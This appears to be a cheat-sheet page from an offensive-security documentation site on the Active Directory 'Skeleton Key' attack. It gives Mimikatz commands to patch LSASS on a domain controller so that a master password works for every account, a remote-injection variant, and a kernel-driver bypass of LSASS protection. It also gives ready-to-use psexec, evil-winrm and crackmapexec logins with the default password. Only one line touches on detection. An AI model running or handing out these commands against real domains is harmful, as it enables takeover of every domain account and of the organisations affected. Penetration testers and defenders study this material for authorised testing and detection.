Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Patch LSASS on DC with master password. All users can authenticate with their real password OR the skeleton key. Does not survive DC reboot.

Mimikatz (On DC)

mimikatz # privilege::debug
mimikatz # misc::skeleton
Default skeleton key: mimikatz

Authenticate with Skeleton Key

# Any user with skeleton password
impacket-psexec DOMAIN/administrator:mimikatz@DC_IP
evil-winrm -i DC_IP -u administrator -p 'mimikatz'
crackmapexec smb DC_IP -u administrator -p 'mimikatz'
Original passwords still work too.

Remote Injection (Needs DA)

If you have code exec on DC: 
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName DC_HOSTNAME

Notes

  • Patches LSASS memory on DC — not persistent across reboots
  • All domain users affected
  • Original passwords still work
  • Default skeleton password: mimikatz
  • LSASS must not be running as Protected Process (PPL)
  • Detection: monitor LSASS memory modifications

If LSASS is Protected (PPL)

mimikatz # misc::skeleton /driver
Loads kernel driver (mimidrv.sys) to bypass PPL.

Quick Reference

TaskCommand
Injectmisc::skeleton (on DC)
Default passwordmimikatz
Loginimpacket-psexec DOMAIN/anyuser:mimikatz@DC
Survives rebootNo